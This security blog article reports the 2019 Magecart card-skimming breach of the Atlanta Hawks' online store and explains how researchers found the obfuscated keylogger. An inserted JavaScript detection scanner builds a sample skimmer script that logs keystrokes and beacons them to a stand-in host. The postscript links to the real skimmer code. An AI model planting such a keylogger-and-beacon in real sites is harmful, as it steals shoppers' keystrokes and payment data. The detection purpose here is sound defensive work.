Magecart Strikes and Scores a 3-Pointer


By Vincent Ekeh | April 30, 2019


A collection of cyber criminals under the Magecart umbrella recently struck the online store of the NBA’s Atlanta Hawks. This Magecart group specializes in skimming credit card details from compromised eCommerce websites using a JavaScript injection attack. This attack joins the growing list of successful Magecart attacks in the last four years.

Magecart gained notoriety and made headlines in the past few years after a number of high-profile attacks on eCommerce sites. The first trace of Magecart malware was detected in March 2016. Among the ever-growing list of attacks were the October 2018 attack on twenty Magento extensions and the attacks on Ticketmaster UK, British Airways, NewEgg, Everlast, and Faber and Faber.

This Atlanta Hawks breach was another high-profile attack from Magecart, as the team's eCommerce site reportedly has over seven million hits per year. Sanguine Security researchers found and reported that transactions on or after April 20th could have been compromised. The threat actors appeared to have harvested names, addresses, and credit card details. They also traced this incident to a malicious domain, imagesengines[.]com, which was very recently registered (March 25, 2019).

To uncover this attack, the researchers built a Magecart detection tool which scans websites for telltale code. It found obfuscated JavaScript code on the Atlanta Hawks' website. The researchers rendered it into a readable format and found instructions to log visitors' keystrokes. Then, they checked its operation using Chrome Developer Tools, the developer console in the Chrome browser, which shows the site's network traffic. Alongside the regular requests targeting the website, they saw that it also sent the logged keystrokes to imagesengines[.]com.
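The detection approach described above, as an added example that is not the researchers' tool or any code from this article: a heuristic scanner that pulls inline scripts out of a page and flags the combination a skimmer needs, a keystroke or form-capture hook together with an outbound beacon, weighted further by obfuscation or by a destination domain that is not first-party. The first-party list, the patterns, and the sample page (with the constructed domain `exfil.example`) are this example's own assumptions.

```javascript
// Added example (not the researchers' tool): a heuristic scanner for Magecart-style
// skimmer indicators in a page's inline scripts. It looks for the combination the
// article describes: keystroke/form capture plus an outbound beacon, especially one
// pointing at a domain that is not first-party, with obfuscation as a further signal.
// All names, patterns and sample data below are this example's own assumptions.

// Domains the shop legitimately talks to (assumption for the sample page).
const FIRST_PARTY = new Set(["hawksshop.com", "www.hawksshop.com"]);

// Keystroke or form-capture hooks.
const CAPTURE_PATTERNS = [
  /addEventListener\(\s*["'](keydown|keyup|keypress|input|change|submit)["']/,
  /\.on(keydown|keyup|keypress|submit)\s*=/,
];
// Ways a script can ship data out of the page.
const BEACON_PATTERNS = [/new\s+Image\(\)/, /XMLHttpRequest/, /fetch\(/, /navigator\.sendBeacon/];
// Common obfuscation tricks used to hide strings from casual inspection.
const OBFUSCATION_PATTERNS = [/String\.fromCharCode/, /\batob\(/, /\bunescape\(/, /\\x[0-9a-f]{2}/i];

// Pull every inline <script> body out of an HTML document (external src scripts yield "").
function extractInlineScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const bodies = [];
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Collect the distinct hostnames referenced by absolute http(s) URLs in a script.
function extractDomains(source) {
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  const found = new Set();
  let m;
  while ((m = re.exec(source)) !== null) found.add(m[1].toLowerCase());
  return [...found];
}

// Score one script body; "suspicious" requires capture plus a beacon plus either a
// third-party destination or obfuscation, so ordinary analytics code does not trip it.
function assessScript(source, firstParty = FIRST_PARTY) {
  const capture = CAPTURE_PATTERNS.some((p) => p.test(source));
  const beacon = BEACON_PATTERNS.some((p) => p.test(source));
  const obfuscated = OBFUSCATION_PATTERNS.some((p) => p.test(source));
  const thirdParty = extractDomains(source).filter((d) => !firstParty.has(d));
  const suspicious = capture && beacon && (thirdParty.length > 0 || obfuscated);
  return { capture, beacon, obfuscated, thirdParty, suspicious };
}

// Assess every inline script on a page; the index lets an analyst locate the offender.
function scanPage(html, firstParty = FIRST_PARTY) {
  return extractInlineScripts(html).map((src, index) => ({ index, ...assessScript(src, firstParty) }));
}

// Constructed sample page: a first-party bundle, a benign first-party ping, and a
// skimmer-like script (hex-escaped string, keydown hook, image beacon to a fake domain).
const SAMPLE_HTML = String.raw`
<html><body>
<script src="https://www.hawksshop.com/static/app.js"></script>
<script>
  window.addEventListener("load", function () { fetch("https://www.hawksshop.com/api/ping"); });
</script>
<script>
  var w = "";
  document.addEventListener("keydown", function (e) { w += e.key; });
  var p = "\x68\x74\x74\x70\x73";
  setInterval(function () {
    (new Image()).src = "https://exfil.example/c.gif?q=" + btoa(w);
  }, 5000);
</script>
</body></html>`;

// Run stand-alone: print the verdict for each inline script on the constructed page.
for (const r of scanPage(SAMPLE_HTML)) {
  console.log(r.index, r.suspicious ? "SUSPICIOUS" : "ok", r.thirdParty.join(",") || "-");
}
```

The heuristic is deliberately conservative: a script is only flagged when it both captures input and ships data out, so a first-party ping or a plain analytics call passes, while the third script, which hooks `keydown` and beacons to a non-first-party host, is the only one reported. In practice this static pass is complemented by watching the browser's network panel, as the researchers did, because a skimmer that assembles its destination at runtime will not expose the domain in its source.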

Alarmingly, Magecart has had huge success on sites that run the Adobe Magento Braintree extension to support payments via the Braintree platform. The Atlanta Hawks' HawksShop.com runs on Adobe's Magento Commerce Cloud 2.2 e-commerce system. Other platforms targeted by the Magecart gangs are OpenCart and the Powerfront CMS. Though Magento itself is quite secure, the researchers suspect that the attackers gained entry to the shop's core via an insecure third-party component, such as a database management tool, a marketing plugin or connected accounting software.

The number of affected customers is currently unknown, and the fate of the stolen credit card details is shrouded in uncertainty. Hackers monetize stolen credit card data by fraudulently purchasing goods and shipping them to associates in the U.S. This is a well-documented money laundering technique. Their U.S. associates, often unwittingly recruited through work-from-home job scams, send the newly purchased goods to other parts of the world, where the criminals sell them on. They could also directly sell the stolen card details on the dark web.

The count of Magecart-affected websites sits upwards of 800, but, apart from the highly publicized Ticketmaster hack, this represents the first sports-related outlet that has been affected. From April 24 until the time of writing this report on April 28th, HawksShop.com was temporarily down for maintenance, presumably to fix this issue.

It is, however, unclear if this is the first skimmer code on HawksShop.com, as researchers from RiskIQ claimed to have found traces of skimming code on the site as far back as June 6th, 2017. According to RiskIQ, "The compromise wasn't targeted however, it was one aimed at hundreds of websites at the same time."

It is still unclear which group within Magecart is responsible for this latest attack, but our analysts speculate that it was Magecart Group 5 because of certain similarities to the 2018 Ticketmaster breach.

All thanks to Magecart for making sure that the Atlanta Hawks, who had one of the worst defenses in the 2018-2019 NBA season, had a similar hard time defending their eCommerce outlet.

Postscript:

For threat analysts, the JavaScript skimmer.js code used for this attack can be found at https://gist.github.com/gwillem/1fffab4f8db513878454d86220545032
